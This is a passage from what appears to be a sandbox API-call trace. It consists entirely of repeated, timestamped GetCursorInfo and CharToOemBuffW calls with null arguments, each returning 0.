cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.053] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.053] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.053] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.053] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.054] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.054] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.054] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.054] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.054] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.054] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.054] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.054] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.054] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.054] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.054] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.054] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.054] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.054] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.054] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.055] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.055] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.055] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.055] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.055] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.055] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.055] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.055] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.055] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.055] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.055] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.055] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.055] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.056] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.056] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.056] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.056] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.056] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.056] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.056] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.056] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.056] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.056] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.056] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.056] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.056] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.057] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.057] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.057] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.057] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.057] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.057] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.057] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.057] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.057] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.057] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.057] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.057] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.057] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.058] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.058] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.058] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.058] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.058] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.058] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.058] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.058] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.058] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.058] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.058] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.058] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.058] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.058] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.059] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.059] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.059] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.059] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.059] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.059] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.059] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.059] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.059] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.059] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.059] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.059] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.059] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.059] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.059] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.059] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.060] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.060] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.060] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.060] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.060] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.060] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.060] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.060] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.060] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.061] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.061] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.061] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.061] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.061] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.061] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.061] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.061] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.061] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.061] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.061] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.062] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.062] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.062] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.062] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.062] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.062] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.062] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.062] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.062] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.062] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.062] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.062] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.063] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.063] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.063] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.063] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.063] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.063] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.063] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.063] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.063] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.064] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.064] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.065] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.065] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.065] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.065] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.065] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.065] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.065] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.065] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.065] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.066] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.066] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.066] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.066] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.066] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.066] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.066] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.067] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.067] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.068] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.068] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.068] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.068] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.068] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.068] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.068] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.068] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.068] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.069] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.069] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.069] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.069] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.069] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.069] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.069] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.069] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.069] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.070] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.070] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.070] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.070] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.070] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.070] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.070] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.070] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.070] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.071] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.071] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.071] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.071] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.071] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.071] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.071] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.071] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.071] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.072] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.072] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.072] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: 